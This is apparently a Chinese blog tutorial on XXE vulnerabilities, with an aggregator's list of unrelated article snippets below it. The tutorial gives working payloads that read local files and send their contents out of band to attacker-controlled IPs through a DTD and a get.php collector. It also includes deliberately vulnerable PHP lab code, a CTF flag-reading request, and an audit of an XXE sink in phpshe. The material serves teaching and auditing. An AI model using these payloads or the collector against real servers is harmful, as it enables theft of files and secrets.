解密XXE漏洞:原理剖析、复现与代码审计实战

news2024/9/23 1:36:25

在网络安全领域,XML外部实体(XXE)漏洞因其隐蔽性和危害性而备受关注。随着企业对XML技术的广泛应用,XXE漏洞也逐渐成为攻击者们利用的重点目标。一个看似无害的XML文件,可能成为攻击者入侵系统的利器。因此,理解XXE漏洞的原理,并掌握其复现与代码审计技巧,对于提升系统安全性至关重要。

本文将深入剖析XXE漏洞的工作原理,展示如何在实际环境中复现该漏洞,并提供详尽的代码审计方法。无论您是网络安全初学者,还是资深开发者,都能从中获得实用的知识和技能。让我们一起解密XXE漏洞,提升我们的安全防护能力。

  1. 基本原理

    1. XML 文档可以包含实体 (Entity),实体可以是内部的(定义在文档内部)或外部的(引用外部资源)。外部实体通常用于在 XML 文档中包含外部数据。如果 XML 解析器允许解析外部实体,那么攻击者可以利用这一点来执行恶意操作。
  2. XXE发现

    1. 黑盒
      1. 获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试
      2. 不管获取的Content—Type类型或数据传输类型,均可尝试修改后提交测试xxe
      3. XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行
    2. 白盒
      1. 可通过应用功能追踪代码定位审计
      2. 可通过脚本特定函数搜索定位审计
      3. 可通过伪协议玩法绕过相关修复等
  3. XXE~payload

    1. 读取文件
      1.   <?xml version="1.0"?>
          <!DOCTYPE Mikasa [
            <!ENTITY test SYSTEM "file:///d:/e.txt">
          ]>
          <user>
            <username>&test;</username>
            <password>Mikasa</password>
          </user>
        
    2. 带外测试
      1.   <?xml version="1.0"?>
          <!DOCTYPE test [
            <!ENTITY % file SYSTEM "http://7drrcs.dnslog.cn">
            %file;
          ]>
          <user>
            <username>&send;</username>
            <password>Mikasa</password>
          </user>
        
    3. 引用外部实体dtd
      1.   <?xml version="1.0" ?>
          <!DOCTYPE test [
          <!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">
          %file;
          ]>
          <user><username>&send;</username><password>Mikasa</password></user>
          -----------------------------------------------------------------------------
          evil2.dtd
          <!ENTITY send SYSTEM "file:///d:/1/1.txt">
        
    4. 无回显读文件-带外
      1.   <?xml version="1.0"?>
          <!DOCTYPE ANY [
          <!ENTITY % file SYSTEM "file:///d:/e.txt">
          <!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
          %remote;
          %all;
          ]>
          <root>&send;</root>
          -------------------------------------------------------------------------------
          服务端
          test.dtd
          <!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">
        
          get.php
          <?php
          $data = $_GET['file'];
          $myfile = fopen("file.txt", "w+");
          fwrite($myfile, $data);
          fclose($myfile);
          ?>
        
  4. 复现

    1. **复现文件:**​php_xxe.zip

    2. 读取文件
      1. 源码
        1.   doLogin.php
            <?php
            $USERNAME = 'admin'; //账号
            $PASSWORD = 'admin'; //密码
            $result = null;
          
            libxml_disable_entity_loader(false);
            $xmlfile = file_get_contents('php://input');
          
            try{
            	$dom = new DOMDocument();
            	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
            	$creds = simplexml_import_dom($dom);
          
            	$username = $creds->username;
            	$password = $creds->password;
          
            	if($username == $USERNAME && $password == $PASSWORD){
            		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
            	}else{
            		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
            	}
            }catch(Exception $e){
            	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
            }
          
            header('Content-Type: text/html; charset=utf-8');
            echo $result;
            ?>
          
      2. 捉取登录框的数据包,替换数据包内容即可

    3. 带外测试
      1. 源码
        <?php
        $USERNAME = 'admin'; //账号
        $PASSWORD = 'admin'; //密码
        $result = null;
        
        libxml_disable_entity_loader(false);
        $xmlfile = file_get_contents('php://input');
        
        try{
        	$dom = new DOMDocument();
        	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
        	$creds = simplexml_import_dom($dom);
        
        	$username = $creds->username;
        	$password = $creds->password;
        
        	if($username == $USERNAME && $password == $PASSWORD){
        		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
        	}else{
        		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
        	}
        }catch(Exception $e){
        	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
        }
        
        header('Content-Type: text/html; charset=utf-8');
        echo $result;
        ?>
        
      2. 捉取数据包,替换其内容即可

    4. 外部实体引用
      1. 源码同上

      2. 本地有一个dtd文件,evil2.dtd,内容为 <!ENTITY send SYSTEM "file:///d:/1/1.txt">

      3. 捉包,改包来引用他

    5. 无回显带外
      1. 源码
        <?php
        $USERNAME = 'admin'; //账号
        $PASSWORD = 'admin'; //密码
        $result = null;
        
        libxml_disable_entity_loader(false);
        $xmlfile = file_get_contents('php://input');
        
        try{
        	$dom = new DOMDocument();
        	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
        	$creds = simplexml_import_dom($dom);
        
        	$username = $creds->username;
        	$password = $creds->password;
        
        	if($username == $USERNAME && $password == $PASSWORD){
        		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
        	}else{
        		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
        	}
        }catch(Exception $e){
        	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
        }
        
        header('Content-Type: text/html; charset=utf-8');
        echo $result;
        ?>
        
      2. 在服务端部署evil2.dtd,和get.php

        1.   <?xml version="1.0"?>
            <!DOCTYPE ANY[
            <!ENTITY % file SYSTEM "file:///d:/1/1.txt">
            <!ENTITY % remote SYSTEM "http://43.139.186.80/evil2.dtd">
            %remote;
            %all;
            ]>
            <root>&send;</root>
            ---------------------------------------------
            服务端
            evil2.dtd
            <!ENTITY % all "<!ENTITY send SYSTEM 'http://43.139.186.80/get.php?file=%file;'>">
          
            get.php
            <?php
            $data = $_GET['file'];
            $myfile = fopen("file.txt", "w+");
            fwrite($myfile, $data);
            fclose($myfile);
            ?>
          
      3. 捉包替换数据包内容将1.txt的内容带到服务端

    6. CTF赛题

      1. 前端代码
        1.   靶场地址:http://web.jarvisoj.com:9882/
            <html>
            <head>
            <link href="//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/css/bootstrap-editable.css" rel="stylesheet"/>
            <script src="//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/js/bootstrap-editable.min.js"></script>
            </head>
            <body>
            <div class="show">
            <textarea id="tip-area" width=100px height=50px disabled></textarea>
            </div>
            <div class="control-area">
            <input id="evil-input" type="text" width=100px height=50px value="type sth!"/>
            <button class="btn btn-default" type="button" onclick="send()">Go!</button>
            </div>
            <script>
            function XHR() {
                    var xhr;
                    try {xhr = new XMLHttpRequest();}
                    catch(e) {
                        var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
                        for (var i=0,len=IEXHRVers.length;i< len;i++) {
                            try {xhr = new ActiveXObject(IEXHRVers[i]);}
                            catch(e) {continue;}
                        }
                    }
                    return xhr;
                }
          
            function send(){
             evil_input = document.getElementById("evil-input").value;
             var xhr = XHR();
                 xhr.open("post","/api/v1.0/try",true);
                 xhr.onreadystatechange = function () {
                     if (xhr.readyState==4 && xhr.status==201) {
                         data = JSON.parse(xhr.responseText);
                         tip_area = document.getElementById("tip-area");
                         tip_area.value = data.task.search+data.task.value;
                     }
                 };
                 xhr.setRequestHeader("Content-Type","application/json");
                 xhr.send('{"search":"'+evil_input+'","value":"own"}');
            }
            </script>
            </body>
            </html>
            //可以看到XMLHttpRequest,猜测存在xxe漏洞·
          
      2. 捉取数据包并修改内容和类型

        POST /api/v1.0/try HTTP/1.1
        Host: web.jarvisoj.com:9882
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        Content-Type: application/xml;charset=utf-8
        Referer: http://web.jarvisoj.com:9882/
        Content-Length: 108
        DNT: 1
        Connection: close
        
        <?xml version = "1.0"?>
        <!DOCTYPE ANY [
            <!ENTITY f SYSTEM "file:///home/ctf/flag.txt">
        ]>
        <x>&f;</x>
        

代码审计流程

  1. 源码链接:https://pan.baidu.com/s/15O6Hf2tM90T3ZEp9E2x_Ew?pwd=cong

  2. 过程
    1. 首先放入审计系统

    2. 搜索可疑xxe函数simplexml_load_string

    3. 看到敏感可疑函数,最终pe_getxml函数的调用

    4. 最终到wechat_getxml,继续全局搜索最终

    5. 最后追踪到这个路径D:\phpstudy_pro\WWW\phpshe\include\plugin\payment\wechat\notify_url.php

    6. 在网站上访问并测试是否存在漏洞

    7. 发现xxe漏洞,因为通过源码发现他的返回结果是固定的,所以利用无回显文件外带即可任意读取

通过本次学习,我们不仅深入了解了XXE漏洞的原理,还掌握了复现该漏洞的具体步骤和代码审计的方法。安全防护不仅是技术问题,更是一种意识和态度。通过对XXE漏洞的全面剖析,我们能够更好地识别和修复潜在的安全风险,从而保护我们的系统和数据安全。

在信息安全的道路上,没有终点。希望本文能为您在安全防护方面提供有价值的指导和帮助,激发您对网络安全的持续关注和兴趣。让我们共同努力,构建一个更为安全的网络环境。如果您有任何疑问或宝贵的建议,欢迎在评论区与我们互动。感谢您的阅读,期待您的反馈与分享!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1976794.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

R语言统计分析——描述性统计

参考资料&#xff1a;R语言实战【第2版】 1、整体统计 对于R语言基础安装&#xff0c;可以使用summary()函数来获取描述性统计量。summary()函数提供了最小值、最大值、四分位数、中位数和算术平均数&#xff0c;以及因子向量和逻辑向量的频数统计。 myvars<-c("mpg&…

JRT多维取数据三件套

今天补齐DolerData判断数据是否存在的API&#xff0c;即M的$d。 兜兜转转&#xff0c;经过近十年探索&#xff0c;3年的酝酿&#xff0c;10个月的开发&#xff0c;JRT终于集齐多维取数据三件套。分别是$get,$listget,$data。通过多维取数据的支持&#xff0c;JRT特别适合医疗数…

7.怎么配置一个axios来拦截前后端请求

首先创建一个axios.js文件 导入我们所需要的依赖 import axios from "axios"; import Element from element-ui import router from "./router"; 设置请求头和它的类型和地址 注意先注释这个url,还没有解决跨域问题,不然会出现跨域 // axios.defaults.…

6-5 多输入多输出通道

虽然我们在前面描述了构成每个图像的多个通道和多层卷积层。例如彩色图像具有标准的RGB通道来代表红、绿和蓝。 但是到目前为止&#xff0c;我们仅展示了单个输入和单个输出通道的简化例子。 这使得我们可以将输入、卷积核和输出看作二维张量。 当我们添加通道时&#xff0c;我…

搭建高可用OpenStack(Queen版)集群(一)之架构环境准备

一、搭建高可用OpenStack&#xff08;Queen版&#xff09;集群之架构环境准备 一、架构设计 二、初始化基础环境 1、管理节点创建密钥对&#xff08;方便传输数据&#xff09; 所有控制节点操作 # ssh-keygen #一路回车即可 Generating public/private rsa key pair. Enter f…

MTK Android12 分析system_app允许vendor_mtk_audiohal_prop SELinux 权限问题

本文将尝试分析&#xff0c;在开发 Android 12 MTK 平台时遇到了 vendor_mtk_audiohal_prop 属性相关的 SELinux 权限问题。包括如何修改 SELinux 策略以允许 system_app 设置 vendor_mtk_audiohal_prop 属性。 问题描述 希望允许 system_app 设置 vendor_mtk_audiohal_prop 属…

SpringBoot+Vue图书(图书借阅)管理系统-附项目源码与配套文档

摘 要 本论文阐述了一套先进的图书管理系统的设计与实现&#xff0c;该系统采用Java语言&#xff0c;结合现代Web开发框架和技术&#xff0c;旨在为图书馆提供高效、灵活且用户友好的资源管理解决方案。系统利用Spring Boot框架为核心&#xff0c;整合MyBatis ORM工具&#…

基于 systemc-2.3.1的virtual device 接入 qemu-arm

1&#xff0c;下载systemc-2.3.1 下载网址&#xff1a; SystemC Files $ wget https://www.accellera.org/images/downloads/standards/systemc/systemc-2.3.1.tgz 2&#xff0c;编译安装 systemc-2.3.1 tar zxf systemc-2.3.1.tgz cd systemc-2.3.1/ export CXXg mkdir bu…

PS 2024 百种常用插件下载安装教程【免费使用,先到先得】

文章目录 软件介绍软件下载安装步骤 专栏推荐&#xff1a; 超多精品软件&#xff08;持续更新中…&#xff09; 软件推荐&#xff1a; PS 2024 PR 2024 软件介绍 PS常用插件 此软件整合了市面近百款ps处理插件&#xff0c;可实现&#xff1a;一键制作背景&#xff0c;一键抠图…

linux安装docker(实操教程)

一、安装前准备工作 1.查看服务器操作系统版本 2.查看服务器的操作系统内核版本 3.安装依赖包 yum install -y yum-utils device-mapper-persistent-data lvm2如果不是root用户登陆的系统&#xff0c;需要手动输入sudo -i切换到root帐户 4.设置阿里云docker-ce镜像源 yum-c…

美国失业率大幅上升,增加九月份降息利率的可能性

令人失望的是&#xff0c;美国7月份经济增加了11.4万个工作岗位&#xff0c;低于预期的17.5万个和6月的17.9万个。平均小时工资持续下降&#xff0c;但失业率升至4.3%。美元继续走低&#xff0c;美国国债也在下跌&#xff0c;而黄金则获得了提振。 7月份的非农业支付数据令人失…

ST语言支持包下载安装(VS CODE)

VSCODE是微软提供的代码编辑器&#xff0c;支持非常多的语言。 1、VSCODE下载 2、ST语言支持包 3、ST语言支持包下载 4、ST语言 。。

IndentationError: expected an indented block 深度解析

IndentationError: expected an indented block 深度解析与实战指南 在Python编程中&#xff0c;IndentationError: expected an indented block是一个常见的错误&#xff0c;通常发生在代码块没有正确缩进时。这个错误表明代码中存在格式问题&#xff0c;可能是缩进不一致或缺…

基于PFC和ECN搭建无损RoCE网络的工作流程分析

无损RoCE网络概念 RDMA&#xff08;Remote Direct Memory Access&#xff0c;远程直接内存访问&#xff09;是一种为了解决网络传输中服务器端数据处理延迟而产生的技术。RDMA 将用户应用中的数据直接传入服务器的存储区&#xff0c;通过网络将数据从一个系统快速传输到远程系…

力扣421.数组中两个数的最大异或和

力扣421.数组中两个数的最大异或和 __builtin_clz()&#xff1a;求出mx二进制最高位之后的0的个数 class Solution {public:int findMaximumXOR(vector<int>& nums) {int mx *max_element(nums.begin(),nums.end());//__builtin_clz函数int high_bit mx ? 31 -…

单元测试JUnit

前言&#x1f440;~ 上一章我们介绍了自动化测试工具Selenium&#xff0c;今天讲解单元测试工具JUnit JUnit JUnit的使用 JUnit注解 BeforeAll和AfterAll注解 BeforeEach和AfterEach注解 参数化 方法获取参数&#xff08;动态参数&#xff09; 断言 用例执行顺序 测…

詹妮弗洛佩兹度过一个单身的季节!知情人:双方无法达成妥协,可能几日内将递交离婚申请!

对于詹妮弗洛佩兹来说&#xff0c;这是一个单身的季节&#xff0c;但这似乎并不是她希望从分居的丈夫本阿弗莱克那里得到的。当她在东海岸的汉普顿度过夏天时&#xff0c;这位 51 岁的演员正忙着在西海岸购买价值 2050 万美元的房产。洛佩兹显然认为&#xff0c;尽管他们已经分…

常见的CMS漏洞解析!

PhPMyadmin&#xff1a; 姿势⼀&#xff1a;通过日志文件拿Shell 利用mysql日志文件写shell&#xff0c;这个日志可以在mysql里改变它的存放位置&#xff0c;登录phpmyadmin可以修改 这个存放位置&#xff0c;并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个…

通讯协议原始指令日志Python脚本分析

一.通讯协议格式&#xff1a; 二.通讯协议原始日志 [2024-04-18 14:58:59.659 D] 99 99 0E 00 01 0A 04 00 01 00 00 00 1E FN FN [2024-04-18 14:58:59.959 D] 99 99 0E 00 01 0C 03 03 01 00 BC FN FN 三.通讯协议原始指令日志Python脚本分析&#xff08;仅解析指令的PC版和…

反制攻击者-蚁剑低版本

目录 安装 攻击者获取防守方的权限 防守方反制攻击者 防守方获取攻击者的shell权限 安装 安装蚁剑2.0.7版本 链接&#xff1a;https://pan.baidu.com/s/1t40UxkZ2XuSWG6VCdGzvDw?pwd8888 提取码&#xff1a;8888 下载好后先打开Loader文件夹下的.exe文件&#xff0c;打…